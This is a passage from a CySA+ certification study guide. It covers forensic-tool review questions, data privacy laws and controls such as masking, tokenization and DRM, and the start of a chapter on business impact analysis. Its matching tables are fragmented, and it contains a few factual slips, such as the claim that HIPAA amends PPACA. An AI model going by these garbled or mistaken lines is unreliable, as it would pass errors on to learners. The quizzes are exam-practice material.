REVIEW QUESTIONS
1. ___________________ is a command-line tool that can
capture packets on Linux and Unix platforms.
2. List at least one password cracking utility.
3. Match the following terms with their definitions.
Ter
ms
Definitions
Le
gal
ho
ld
Forensic technique used when only fragments of data are
available and when no file system metadata is available
Ha
shi
ng
Often requires that organizations maintain archived data
for longer periods
Ca
rvi
ng
A command-line tool that can capture packets on Linux
and Unix platforms
tcp
du
m
p
Process used to determine the integrity of files
4. The DoD created a fork (a variation) of the dd command
called ___________ that adds additional forensic
functionality.
5. List at least two memory-reading tools.
6. Match the following terms with their definitions.
Terms
Definitions
Forensic
Toolkit (FTK)
Live CD with which you can acquire evidence
and make drive images
Helix
Linux command that is used is to convert and
copy files
John the
Ripper
A commercial toolkit that can scan a hard drive
for all sorts of information
dd
Password cracker that can work in Linux or
Unix as well as macOS
7. Cellebrite found a niche by focusing on collecting evidence
from ______________.
8. List at least two advantages of the cloud-based approach to
vulnerability scanning.
9. Match the following terms with their definitions.
Ter
ms
Definitions
M
e
m
du
m
p
Memory acquisition and analysis tool used with Windows
systems
K
nT
To
ol
s
A cloud-based vulnerability scanner
F
A
Memory forensic tool that automates the process of
extracting interesting data from volatile memory
T
Ki
t
Q
ua
lys
Free tool that runs on Windows, Linux, and Solaris and
simply creates a bit-by-bit copy of the volatile memory on a
system
10. _____________ often require that organizations
maintain archived data for longer periods.
Chapter 19
The Importance of Data
Privacy and Protection
This chapter covers the following topics related to Objective 5.1
(Understand the importance of data privacy and protection) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Privacy vs. security: Compares these two concepts as they relate
to data privacy and protection.
Non-technical controls: Describes classification, ownership,
retention, data types, retention standards, confidentiality, legal
requirements, data sovereignty, data minimization, purpose
limitation, and non-disclosure agreement (NDA).
Technical controls: Covers encryption, data loss prevention
(DLP), data masking, deidentification, tokenization, digital rights
management (DRM), geographic access requirements, and access
controls.
Addressing data privacy and protection issues has become one
of the biggest challenges facing organizations that handle the
information of employees, customers, and vendors. This chapter
explores those data privacy and protection issues and describes
the various controls that can be applied to mitigate them. New
data privacy laws are being enacted regularly, such as the EU
GDPR, that require new controls to protect data.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks.” Table 19-1
lists the major headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 19-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Privacy vs. Security
1, 2, 3
Non-technical Controls
4, 5, 6
Technical Controls
7, 8, 9
1. Which of the following relates to rights to control the
sharing and use of one’s personal information?
1. Security
2. Privacy
3. Integrity
4. Confidentiality
2. Which of the following is a risk assessment that determines
risks associated with PII collection?
1. MTA
2. PIA
3. RSA
4. SLA
3. Third-party personnel should be familiarized with
organizational policies related to data privacy and should
sign which of the following?
1. NDA
2. MOU
3. ICA
4. SLA
4. Which of the following is a measure of how freely data can
be handled?
1. Sensitivity
2. Privacy
3. Secrecy
4. Criticality
5. Which of the following affects any organizations that handle
cardholder information for the major credit card
companies?
1. GLBA
2. PCI DSS
3. SOX
4. HIPAA
6. Which of the following affects all healthcare facilities, health
insurance companies, and healthcare clearinghouses?
1. GLBA
2. PCI DSS
3. SOX
4. HIPAA
7. Which control provides data confidentiality?
1. Encryption
2. Hashing
3. Redundancy
4. Digital signatures
8. Which control provides data integrity?
1. Encryption
2. Hashing
3. Redundancy
4. Digital signatures
9. Which of the following means altering data from its original
state to protect it?
1. Deidentification
2. Data masking
3. DLP
4. Digital signatures
FOUNDATION TOPICS
PRIVACY VS. SECURITY
Privacy relates to rights to control the sharing and use of one’s
personal information, commonly called personally identifiable
information (PII), as described in Chapter 15, “The Incident
Response Process.” Privacy of data relies heavily on the security
controls that are in place. While organizations can provide
security without ensuring data privacy, data privacy cannot
exist without the appropriate security controls. A privacy
impact assessment (PIA) is a risk assessment that determines
risks associated with PII collection, use, storage, and
transmission. A PIA should determine whether appropriate PII
controls and safeguards are implemented to prevent PII
disclosure or compromise. The PIA should evaluate personnel,
processes, technologies, and devices. Any significant change
should result in another PIA review.
As part of prevention of privacy policy violations, any
contracted third parties that have access to PII should be
assessed to ensure that the appropriate controls are in place. In
addition, third-party personnel should be familiarized with
organizational policies and should sign non-disclosure
agreements (NDAs).
NON-TECHNICAL CONTROLS
Non-technical controls are implemented without technology
and consist of the organization’s policies and procedures for
maintaining data privacy and protection. This section describes
some of these non-technical controls, which are also sometimes
called administrative controls. Non-technical controls are
covered in detail in Chapter 3, “Vulnerability Management
Activities.”
Classification
Data classification helps to ensure that appropriate security
measures are taken with regard to sensitive data types and is
covered in Chapter 13, “The Importance of Proactive Threat
Hunting.”
Ownership
In Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” you will learn more about policies
that act as non-technical controls. One of those policies is the
data ownership policy, which is closely related to the data
classification policy (covered in Chapter 13). Often, the two
policies are combined because, typically, the data owner is
tasked with classifying the data. Therefore, the data ownership
policy covers how the owner of each piece of data or each data
set is identified. In most cases, the creator of the data is the
owner, but some organizations may deem all data created by a
department to be owned by the department head. Another way
a user may become the owner of data is by introducing into the
organization data the user did not create. Perhaps the data was
purchased from a third party. In any case, the data ownership
policy should outline both how data ownership occurs and the
responsibilities of the owner with respect to determining the
data classification and identifying those with access to the data.
Retention
Another policy that acts as a non-technical control is the data
retention policy, which outlines how various data types must be
retained and may rely on the data classifications described in
the data classification policy. Data retention requirements vary
based on several factors, including data type, data age, and legal
and regulatory requirements. Security professionals must
understand where data is stored and the type of data stored. In
addition, security professionals should provide guidance on
managing and archiving data securely. Therefore, each data
retention policy must be established with the help of
organizational personnel.
A data retention policy usually identifies the purpose of the
policy, the portion of the organization affected by the policy, any
exclusions to the policy, the personnel responsible for
overseeing the policy, the personnel responsible for data
destruction, the data types covered by the policy, and the
retention schedule. Security professionals should work with
data owners to develop the appropriate data retention policy for
each type of data the organization owns. Examples of data types
include, but are not limited to, human resources data, accounts
payable/receivable data, sales data, customer data, and e-mail.
Designing a data retention policy is covered more fully in the
upcoming section “Retention Standards.”
Data Types
Categorizing data types is a non-technical control for ensuring
data privacy and protection. To properly categorize data types, a
security analyst should be familiar with some of the most
sensitive types of data that the organization may possess, as
described in the sections that follow.
Personally Identifiable Information (PII)
When considering technology and its use today, privacy is a
major concern of users. This privacy concern usually involves
three areas: which personal information can be shared with
whom, whether messages can be exchanged confidentially, and
whether and how one can send messages anonymously. Privacy
is an integral part of any security measures that an organization
takes. As part of the security measures that organizations must
take to protect privacy, PII must be understood, identified, and
protected. Refer to Chapter 15 for more details about protecting
PII.
Personal Health Information (PHI)
PHI is a particular type of PII that an organization may possess,
particularly healthcare organizations. Chapter 15 also provides
more details about protecting PHI.
Payment Card Information
Another type of PII that almost all companies possess is credit
card data. Holders of this data must protect it. Many of the
highest-profile security breaches that have occurred have
involved the theft of this data. The Payment Card Industry
Data Security Standard (PCI DSS) applies to this type of
data. The handling of payment card information is covered in
Chapter 5, “Threats and Vulnerabilities Associated with
Specialized Technology.”
Retention Standards
Retention standards are another non-technical control for
ensuring data privacy and protection. Retention standards are
covered in Chapter 21.
Confidentiality
The three fundamentals of security are confidentiality, integrity,
and availability (CIA). Most security issues result in a violation
of at least one facet of the CIA triad. Understanding these three
security principles will help security professionals ensure that
the security controls and mechanisms implemented protect at
least one of these principles.
To ensure confidentiality, you must prevent the disclosure of
data or information to unauthorized entities. As part of
confidentiality, the sensitivity level of data must be determined
before any access controls are put in place. Data with a higher
sensitivity level will have more access controls in place than
data with a lower sensitivity level. The opposite of
confidentiality is disclosure. Most security professionals
consider confidentiality as it relates to data on a network or
devices. However, data can also exist in printed format.
Appropriate controls should be put into place to protect data on
a network, but data in its printed format needs to be protected,
too, which involves implementing data disposal policies.
Examples of controls that improve confidentiality include
encryption, steganography, access control lists (ACLs), and data
classification.
Legal Requirements
Legal requirements are a form of non-technical controls that
can mandate technical controls. In some cases, the design of
controls will be driven by legal requirements that apply to the
organization based on the industry or sector in which it
operates. In Chapter 15 you learned the importance of
recognizing legal responsibilities during an incident response.
Let’s examine some of the laws and regulations that may come
into play.
The United States and European Union (EU) both have
established laws and regulations that affect organizations that
operate within their area of governance. While security
professionals should strive to understand laws and regulations,
security professionals may not have the level of knowledge and
background to fully interpret these laws and regulations to
protect their organization. In these cases, security professionals
should work with legal representation regarding legislative or
regulatory compliance.
Security analysts must be aware of the laws and, at a minimum,
understand how the laws affect the operations of their
organization. For example, a security professional working for a
healthcare facility would need to understand all security
guidelines in HIPAA and PPACA, described next. The following
are the most significant laws that may affect an organization
and its security policy:
Sarbanes-Oxley Act (SOX): Also known as the Public Company
Accounting Reform and Investor Protection Act of 2002, affects any
organization that is publicly traded in the United States. It controls
the accounting methods and financial reporting for the
organizations and stipulates penalties and even jail time for
executive officers.
Health Insurance Portability and Accountability Act
(HIPAA): Also known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies, and healthcare
clearinghouses. It is enforced by the Office of Civil Rights (OCR) of
the Department of Health and Human Services (HSS). It provides
standards and procedures for storing, using, and transmitting
medical information and healthcare data. HIPAA overrides state
laws unless the state laws are stricter. It amends the Patient
Protection and Affordable Care Act (PPACA), commonly known as
Obamacare.
Gramm-Leach-Bliley Act (GLBA) of 1999: Affects all financial
institutions, including banks, loan companies, insurance
companies, investment companies, and credit card providers. It
provides guidelines for securing all financial information and
prohibits sharing financial information with third parties. This act
directly affects the security of PII.
Computer Fraud and Abuse Act (CFAA) of 1986: Affects any
entities that engage in hacking of “protected computers,” as defined
in the act. It was amended in 1989, 1994, and 1996; in 2001 by the
USA PATRIOT Act (listed below); in 2002; and in 2008 by the
Identity Theft Enforcement and Restitution Act. A “protected
computer” is a computer used exclusively by a financial institution
or the U.S. government or used in or affecting interstate or foreign
commerce or communication, including a computer located outside
the United States that is used in a manner that affects interstate or
foreign commerce or communication of the United States. Due to
the interstate nature of most Internet communication, any ordinary
computer has come under the jurisdiction of the law, including cell
phones. The law includes several definitions of hacking, including
knowingly accessing a computer without authorization;
intentionally accessing a computer to obtain financial records, U.S.
government information, or protected computer information; and
transmitting fraudulent commerce communication with the intent
to extort.
Federal Privacy Act of 1974: Affects any computer that
contains records used by a federal agency. It provides guidelines on
collection, maintenance, use, and dissemination of PII about
individuals that is maintained in systems of records by federal
agencies on collecting, maintaining, using, and distributing PII.
Federal Intelligence Surveillance Act (FISA) of 1978:
Affects law enforcement and intelligence agencies. It was the first
act to give procedures for the physical and electronic surveillance
and collection of “foreign intelligence information” between
“foreign powers” and “agents of foreign powers” and applied only to
traffic within the United States. It was amended by the USA
PATRIOT Act of 2001 and the FISA Amendments Act of 2008.
Electronic Communications Privacy Act (ECPA) of 1986:
Affects law enforcement and intelligence agencies. It extended
government restrictions on wiretaps from telephone calls to include
transmissions of electronic data by computer and prohibited access
to stored electronic communications. It was amended by the
Communications Assistance to Law Enforcement Act (CALEA) of
1994, the USA PATRIOT Act of 2001, and the FISA Amendments
Act of 2008.
Computer Security Act of 1987: Superseded in 2002 by FISMA
(listed below), the first law to require a formal computer security
plan. It was written to protect and defend the sensitive information
in the federal government systems and provide security for that
information. It also placed requirements on government agencies to
train employees and identify sensitive systems.
United States Federal Sentencing Guidelines of 1991:
Affects individuals and organizations convicted of felonies and
serious (Class A) misdemeanors. It provides guidelines to prevent
sentencing disparities that existed across the United States.
Communications Assistance for Law Enforcement Act
(CALEA) of 1994: Affects law enforcement and intelligence
agencies. It requires telecommunications carriers and
manufacturers of telecommunications equipment to modify and
design their equipment, facilities, and services to ensure that they
have built-in surveillance capabilities. This allows federal agencies
to monitor all telephone, broadband Internet, and voice over IP
(VoIP) traffic in real time.
Personal Information Protection and Electronic
Documents Act (PIPEDA): Affects how private-sector
organizations collect, use, and disclose personal information in the
course of commercial business in Canada. The act was written to
address EU concerns about the security of PII in Canada. The law
requires organizations to obtain consent when they collect, use, or
disclose personal information and to have personal information
policies that are clear, understandable, and readily available.
Basel II: Affects financial institutions. It addresses minimum
capital requirements, supervisory review, and market discipline. Its
main purpose is to protect against risks that banks and other
financial institutions face.
Federal Information Security Management Act (FISMA)
of 2002: Affects every federal agency. It requires federal agencies
to develop, document, and implement an agencywide information
security program.
Economic Espionage Act of 1996: Affects companies that have
trade secrets and any individuals who plan to use encryption
technology for criminal activities. This act covers a multitude of
issues because of the way it was structured. A trade secret does not
need to be tangible to be protected by this act. Per this law, theft of
a trade secret is now a federal crime, and the United States
Sentencing Commission must provide specific information in its
reports regarding encryption or scrambling technology that is used
illegally.
USA PATRIOT Act of 2001: Formally known as Uniting and
Strengthening America by Providing Appropriate Tools Required
to Intercept and Obstruct Terrorism, it affects law enforcement and
intelligence agencies in the United States. Its purpose is to enhance
the investigatory tools that law enforcement can use, including email communications, telephone records, Internet
communications, medical records, and financial records. When this
law was enacted, it amended several other laws, including FISA and
the ECPA of 1986. The USA PATRIOT Act does not restrict private
citizens’ use of investigatory tools, although there are some
exceptions—for example, if the private citizen is acting as a
government agent (even if not formally employed), if the private
citizen conducts a search that would require law enforcement to
have a warrant, if the government is aware of the private citizen’s
search, or if the private citizen is performing a search to help the
government.
Health Care and Education Reconciliation Act of 2010:
Affects healthcare and educational organizations. This act increased
some of the security measures that must be taken to protect
healthcare information.
Employee Privacy Issues and Expectation of Privacy:
Employee privacy issues must be addressed by all organizations to
ensure that the organizations are protected from costly legal
penalties that result from data breaches. However, organizations
must give employees the proper notice of any monitoring that might
be used. Organizations must also ensure that the monitoring of
employees is applied in a consistent manner. Many organizations
implement a no-expectation-of-privacy policy that the employee
must sign after receiving the appropriate training. This policy
should specifically describe any unacceptable behavior. Companies
should also keep in mind that some actions are protected by the
Fourth Amendment. Security professionals and senior management
should consult with legal counsel when designing and
implementing any monitoring solution.
European Union: The EU has implemented several laws and
regulations that affect security and privacy. The EU Principles on
Privacy include strict laws to protect private data. The EU’s Data
Protection Directive provides direction on how to follow the laws
set forth in the principles. The EU created the Safe Harbor Privacy
Principles to help guide U.S. organizations in compliance with the
EU Principles on Privacy. The following are some of the guidelines
as updated by the General Data Protection Regulation (GDPR).
Personal data may not be processed unless there is at least one legal
basis to do so. Article 6 states the lawful purposes are
If the data subject has given consent to the processing of his or
her personal data
To fulfill contractual obligations with a data subject, or for tasks
at the request of a data subject who is in the process of entering
into a contract
To comply with a data controller’s legal obligations
To protect the vital interests of a data subject or another
individual
To perform a task in the public interest or in official authority
For the legitimate interests of a data controller or a third party,
unless these interests are overridden by interests of the data
subject or her or his rights according to the Charter of
Fundamental Rights (especially in the case of children)
Note
Do not confuse the terms safe harbor and data haven. According to the EU, a
safe harbor is an entity that conforms to all the requirements of the EU
Principles on Privacy. A data haven is a country that fails to legally protect
personal data, with the main aim being to attract companies engaged in the
collection of the data.
The EU Electronic Security Directive defines electronic
signature principles. In this directive, a signature must be
uniquely linked to the signer and to the data to which it relates
so that any subsequent data change is detectable. The signature
must be capable of identifying the signer.
Data Sovereignty
Data sovereignty is the concept that data stored in digital
format is subject to the laws of the country in which the data is
located. Affecting this concept are the differing privacy laws and
regulations issued by nations and governing bodies. This
concept is further complicated by the deploying of cloud
solutions.
Many countries have adopted legislation that requires customer
data to be kept within the country in which the customer
resides. But organizations are finding it increasingly difficult to
ensure that this is the case when working with service providers
and other third parties. Organizations should consult with the
service-level agreements (SLAs) with these providers to verify
compliance.
Keep in mind, however, that the laws of multiple countries may
affect the data. For instance, suppose an organization in the
United States is using a data center in the United States but the
data center is operated by a company from France. The data
would then be subject to both U.S. and EU laws and regulations.
Another factor would be the type of data being stored, as
different types of data are regulated differently. Healthcare data
and consumer data have vastly separate laws that regulate the
transportation and storage of data.
Security professionals should answer the following questions:
Where is the data stored?
Who has access to the data?
Where is the data backed up?
How is the data encrypted?
The answers to these four questions will help security
professionals design a governance strategy for their
organization that will aid in addressing any data sovereignty
concerns. Remember that the responsibility to meet data
regulations falls on both the organization that owns the data
and the vendor providing the data storage service, if any.
Data Minimization
Organizations should minimize the amount of personal data
they store to what is necessary. An important principle in the
European Union’s General Data Protection Regulation (GDPR)
is data minimization. Data processing should only use as much
data as is required to successfully accomplish a given task. By
reducing the amount of personal data, the attack surface is also
reduced.
Purpose Limitation
Another key principle in the European Union’s GDPR that is
finding wide adoption is that of purpose limitation. Personal
data collected for one purpose cannot be repurposed without
further consent from the individual. For example data collected
to track a disease outbreak cannot be used to identify
individuals.
Non-disclosure agreement (NDA)
In Chapter 15 you learned about various types of intellectual
property, such as patents, copyrights, and trade secrets. Most
organizations that have trade secrets attempt to protect them by
using NDAs. An NDA must be signed by any entity that has
access to information that is part of a trade secret. Anyone who
signs an NDA will suffer legal consequences if the organization
is able to prove that the signer violated it.
TECHNICAL CONTROLS
Technical controls are implemented with technology and
include items such as firewalls, access lists (ACLs), permissions
on files and folders, and devices that identify and prevent
threats. After it understands the threats, an organization needs
to establish likelihoods and impacts, and it needs to select
controls that, while addressing a threat, do not cost more than
the cost of the realized threat. The review of these controls
should be an ongoing process.
Encryption
In Chapter 8, “Security Solutions for Infrastructure
Management,” you learned about encryption and cryptography.
These technologies comprise a technical control that can be
used to provide the confidentiality objective of the CIA triad.
Information assets can be protected from being accessed by
unauthorized parties by encrypting data at rest (while stored)
and data in transit (when crossing a network). As you also
learned, cryptography in the form of hashing algorithms can
also provide a way to asses data integrity.
Data Loss Prevention (DLP)
Chapter 12, “Implementing Configuration Changes to Existing
Controls to Improve Security,” described data loss prevention
(DLP) systems. As you learned, DLP systems are used to
prevent data exfiltration, which is the intentional or
unintentional loss of sensitive data from the network. DLP
comprises a strong technical control that protects both integrity
and confidentiality.
Data Masking
Data masking means altering data from its original state to
protect it. You already learned about two forms of masking,
encryption (storing the data in an encrypted form) and hashing
(storing a hash value, generated from the data by a hashing
algorithm, rather than the data itself). Many passwords are
stored as hash values.
The following are some other methods of data masking:
Using substitution tables and aliases for the data
Redacting or replacing the sensitive data with a random value
Averaging or taking individual values and averaging them (adding
them and then dividing by the number of individual values) or
aggregating them (totaling them and using only the total value)
Deidentification
Data deidentification or data anonymization is the process of
deleting or masking personal identifiers, such as personal
names, from a set of data. Deidentification is often done when
the data is being used in the aggregate, such as when medical
data is used for research. It is a technical control that is used as
one of the main approaches to ensuring data privacy protection.
Tokenization
Tokenization is another form of data hiding or masking in
that it replaces a value with a token that is used instead of the
actual value. For example, tokenization is a new emerging
standard for mobile transactions; numeric tokens are used to
protect cardholders’ sensitive credit and debit card information.
This is a great security feature that substitutes the primary
account number with a numeric token that can be processed by
all participants in the payment ecosystem. Figure 19-1 shows the
use of tokens in a credit card transaction using a smartphone.
Digital Rights Management (DRM)
Hardware manufacturers, publishers, copyright holders, and
individuals use digital rights management (DRM) to
control the use of digital content. DRM often also involves
device controls. First-generation DRM software controls
copying. Second-generation DRM software controls executing,
viewing, copying, printing, and altering works or devices.
The U.S. Digital Millennium Copyright Act (DMCA) of
1998 imposes criminal penalties on those who make available
technologies whose primary purpose is to circumvent content
protection technologies. DRM includes restrictive license
agreements and encryption. DRM protects computer games and
other software, documents, e-books, films, music, and
television.
FIGURE 19-1 Tokenization
In most enterprise implementations, the primary concern is the
DRM control of documents by using open, edit, print, or copy
access restrictions that are granted on a permanent or
temporary basis. Solutions can be deployed that store the
protected data in a central or decentralized model. Encryption is
used in the DRM implementation to protect the data both at
rest and in transit.
Today’s DRM implementations include the following:
Directories:
Lightweight Directory Access Protocol (LDAP)
Active Directory (AD)
Custom
Permissions:
Open
Print
Modify
Clipboard
Additional controls:
Expiration (absolute, relative, immediate revocation)
Version control
Change policy on existing documents
Watermarking
Online/offline
Auditing
Ad hoc and structured processes:
User initiated on desktop
Mapped to system
Built into workflow process
Document DRM
Organizations implement DRM to protect confidential or
sensitive documents and data. Commercial DRM products allow
organizations to protect documents and include the capability
to restrict and audit access to documents. Some of the
permissions that can be restricted using DRM products include
reading and modifying a file, removing and adding watermarks,
downloading and saving a file, printing a file, or even taking
screenshots. If a DRM product is implemented, the organization
should ensure that the administrator is properly trained and
that policies are in place to ensure that rights are appropriately
granted and revoked.
Music DRM
DRM has been used in the music industry for some time now.
Subscription-based music services, such as Napster, use DRM
to revoke a user’s access to downloaded music once their
subscription expires. While technology companies have
petitioned the music industry to allow them to sell music
without DRM, the industry has been reluctant to do so.
Movie DRM
While the movie industry has used a variety of DRM schemes
over the years, two main technologies are used for the mass
distribution of media:
Content Scrambling System (CSS): Uses encryption to
enforce playback and region restrictions on DVDs. This system can
be broken using Linux’s DeCSS tool.
Advanced Access Content System (AACS): Protects Blu-ray
and HD DVD content. Hackers have been able to obtain the
encryption keys to this system.
This industry continues to make advances to prevent hackers
from creating unencrypted copies of copyrighted material.
Video Game DRM
Most video game DRM implementations rely on proprietary
consoles that use Internet connections to verify video game
licenses. Most consoles today verify the license upon installation
and allow unrestricted use from that point. However, to obtain
updates, the license will again be verified prior to download and
installation of the update.
E-Book DRM
E-book DRM is considered to be the most successful DRM
deployment. Both Amazon’s Kindle and Barnes and Nobles’
Nook devices implement DRM to protect electronic forms of
books. Both of these companies have released mobile apps that
function like the physical e-book devices.
Today’s implementation uses a decryption key that is installed
on the device. This means that the e-books cannot be easily
copied between e-book devices or applications. Adobe created
the Adobe Digital Experience Protection Technology (ADEPT)
that is used by most e-book readers except Amazon’s Kindle.
With ADEPT, AES is used to encrypt the media content, and
RSA encrypts the AES key.
Watermarking
Digital watermarking is another method used to deter
unauthorized use of a document. Digital watermarking involves
embedding a logo or trademark in documents, pictures, or other
objects. The watermark deters people from using the materials
in an unauthorized manner.
Geographic Access Requirements
While a discussion of geographic issues were included in
Chapter 9, authentication systems can make use of geofencing.
Geofencing is the application of geographic limits to where a
device can be used. It depends on the use of Global Positioning
System (GPS) or radio frequency identification (RFID)
technology to create a virtual geographic boundary.
Access Controls
Chapter 8 covered identity and access management systems in
depth. Along with encryption, access controls are the main
security controls implemented to ensure confidentiality. In
Chapter 21, you will learn how access controls fit into the set of
controls used to maintain security.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 19-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 19-2 Key Topics in Chapter 19
Key Topic
Element
Bulleted list
Description
Significant data privacy and
protection legislation
Page
Number
511
Section
Description of data sovereignty
514
Bulleted list
Methods of data masking
517
Figure 19-1
Tokenization
518
Bulleted list
DRM implementations
519
Bulleted list
DRM schemes
520
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
privacy
Sarbanes-Oxley Act (SOX)
Health Insurance Portability and Accountability Act (HIPAA)
Gramm-Leach-Bliley Act (GLBA) of 1999
Computer Fraud and Abuse Act (CFAA)
Federal Privacy Act of 1974
Federal Intelligence Surveillance Act (FISA) of 1978
Electronic Communications Privacy Act (ECPA) of 1986
Computer Security Act of 1987
United States Federal Sentencing Guidelines of 1991
Personal Information Protection and Electronic Documents
Act (PIPEDA)
Basel II
Federal Information Security Management Act (FISMA) of
2002
Economic Espionage Act of 1996
USA PATRIOT Act of 2001
Health Care and Education Reconciliation Act of 2010
employee privacy issues and expectation of privacy
data sovereignty
data masking
deidentification
tokenization
digital rights management (DRM)
U.S. Digital Millennium Copyright Act (DMCA) of 1998
Content Scrambling System (CSS)
Advanced Access Content System (AACS)
digital watermarking
geofencing
REVIEW QUESTIONS
1. Data should be classified based on its ________ to the
organization.
2. List at least two considerations when assigning a level of
criticality.
3. Match the following terms with their definitions.
Terms
Definitions
Sensit
ivity
A measure of the importance of the data
Critic
ality
The application of geographic limits to where a device
can be used
Geofe
ncing
The concept that data stored in digital format is subject
to the laws of the country in which the data is located
Data
sover
eignty
A measure of how freely data can be handled
4. A ________________ policy outlines how various data
types must be retained and may rely on the data
classifications described in the data classification policy.
5. According to the GPDR, personal data may not be processed
unless there is at least one legal basis to do so. List at least
two of these legal bases.
6. Match the following terms with their definitions.
Terms
Definitions
Tokeni
zation
Protects Blu-ray and HD DVD content, though
hackers have been able to obtain the encryption keys
to this system
Digital
waterm
arking
Affects any organizations that handle cardholder
information for the major credit card companies
AACS
Involves embedding a logo or trademark in
documents, pictures, or other objects
PCI
DSS
Another form of data hiding or masking in that it
replaces a value with a token that is used instead of the
actual value
7. _________________ means altering data from its
original state to protect it.
8. List at least one method of data masking.
9. Match the following terms with their definitions.
Ter
ms
H
I
Definitions
Affects any organization that is publicly traded in the United
States
P
A
A
S
O
X
Affects any entities that might engage in hacking of
“protected computers,” as defined in the act
G
L
B
A
Affects all financial institutions, including banks, loan
companies, insurance companies, investment companies,
and credit card providers
C
F
A
A
Legislation affecting healthcare facilities
10. _________________ is the application of geographic
limits to where a device can be used.
Chapter 20
Applying Security Concepts
in Support of
Organizational Risk
Mitigation
This chapter covers the following topics related to Objective 5.2
(Given a scenario, apply security concepts in support of
organizational risk mitigation) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
Business impact analysis: Describes how to assess the level of
criticality of business functions to the overall organization.
Risk identification process: Includes classification, ownership,
retention, data types, retention standards, and confidentiality.
Risk calculation: Covers probability and magnitude.
Communication of risk factors: Discusses the process of
sharing with critical parties.
Risk prioritization: Includes security controls and engineering
tradeoffs.
System assessment: Describes the process of system assessment.
Documented compensating controls: Covers the use of
additional controls.
Training and exercises: Includes red team, blue team, white
team, and tabletop exercise.
Supply chain assessment: Covers vendor due diligence and
hardware source authenticity.
The risk management process is a formal method of evaluating
vulnerabilities. A robust risk management process will identify
vulnerabilities that need to be addressed and will generate an
assessment of the impact and likelihood of an attack that takes
advantage of the vulnerability. The process also includes a
formal assessment of possible risk mitigations. This chapter
explores the types of risk management processes and how they
are used to mitigate risk.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 20-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 20-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Business Impact Analysis
1
Risk Identification Process
2
Risk Calculation
3
Communication of Risk Factors
4
Risk Prioritization
5
Systems Assessment
6
Documented Compensating Controls
7
Training and Exercises
8
Supply Chain Assessment
9
1. Which of the following is the first step in the BIA?
1. Identify resource requirements.
2. Identify outage impacts and estimate downtime.
3. Identify critical processes and resources.
4. Identify recovery priorities.
2. Which of the following is not a goal of risk assessment?
1. Identify vulnerabilities and threats.
2. Identify key stakeholders.
3. Identify assets and asset value.
4. Calculate threat probability and business impact.
3. Which of the following is the monetary impact of each threat
occurrence?
1. ALE
2. SLE
3. AV
4. EF
4. The non-technical leadership audience needs which of the
following to be stressed in the communication of risk factors
to stakeholders?
1. The technical risks
2. Security operations difficulties
3. The cost of cybersecurity expenditures
4. Translation of technical risk into common business terms
5. Which of the following processes involves terminating the
activity that causes a risk or choosing an alternative that is
not as risky?
1. Risk avoidance
2. Risk transfer
3. Risk mitigation
4. Risk acceptance
6. Which of the following occurs when the adequacy of a
system’s overall security is accepted by management?
1. Certification
2. Accreditation
3. Acceptance
4. Due diligence
7. To implement ISO/IEC 27001:2013, the project manager
should complete which step first?
1. Identify the requirements
2. Obtain management support
3. Perform risk assessment and risk treatment
4. Define the ISMS scope, information security policy, and
information security objectives
8. Which of the following are in place to substitute for a
primary access control and mainly act to mitigate risks?
1. Compensating controls
2. Secondary controls
3. Accommodating controls
4. Directive controls
9. Which team acts as the attacking force?
1. Green
2. Red
3. Blue
4. White
FOUNDATION TOPICS
BUSINESS IMPACT ANALYSIS
A business impact analysis (BIA) is a functional analysis
that occurs as part of business continuity and planning for
disaster recovery. Performing a thorough BIA will help business
units understand the impact of a disaster. The resulting
document that is produced from a BIA lists the critical and
necessary business functions, their resource dependencies, and
their level of criticality to the overall organization.
The BIA helps the organization to understand what impact a
disruptive event would have on the organization. It is a
management-level analysis that identifies the impact of losing
an organization’s resources.
The four main steps of the BIA are as follows:
1. Identify critical processes and resources.
2. Identify outage impacts and estimate downtime.
3. Identify resource requirements.
4. Identify recovery priorities.
The BIA relies heavily on any vulnerability analysis and risk
assessment that is completed. The vulnerability analysis and
risk assessment may be performed by the Business
Continuity Planning (BCP) committee or by a separately
appointed risk assessment team.
Identify Critical Processes and Resources
When identifying the critical processes and resources of an
organization, the BCP committee must first identify all the
business units or functional areas within the organization. After
all units have been identified, the BCP team should select which
individuals will be responsible for gathering all the needed data
and select how to obtain the data. These individuals will gather
the data using a variety of techniques, including questionnaires,
interviews, and surveys. They might also actually perform a
vulnerability analysis and risk assessment or use the results of
these tests as input for the BIA. During the data gathering, the
organization’s business processes and functions and the
resources upon which these processes and functions depend
should be documented. This list should include all business
assets, including physical and financial assets that are owned by
the organization, and any assets that provide competitive
advantage or credibility.
After determining all the business processes, functions, and
resources, the organization should then determine the criticality
level of each process, function, and resource. This is done by
analyzing the impact that the loss of each resource would
impose on the capability to continue to do business.
Identify Outage Impacts and Estimate Downtime
Analyzing the impact that the loss of each resource would
impose on the ability to continue to do business will provide the
raw material to generate metrics used to determine the extent to
which redundancy must be provided to each resource. You
learned about metrics such as MTD, MTTR, and RTO that are
used to assess downtime and recovery time in Chapter 16,
“Applying the Appropriate Incident Response Procedure.”
Please review those concepts.
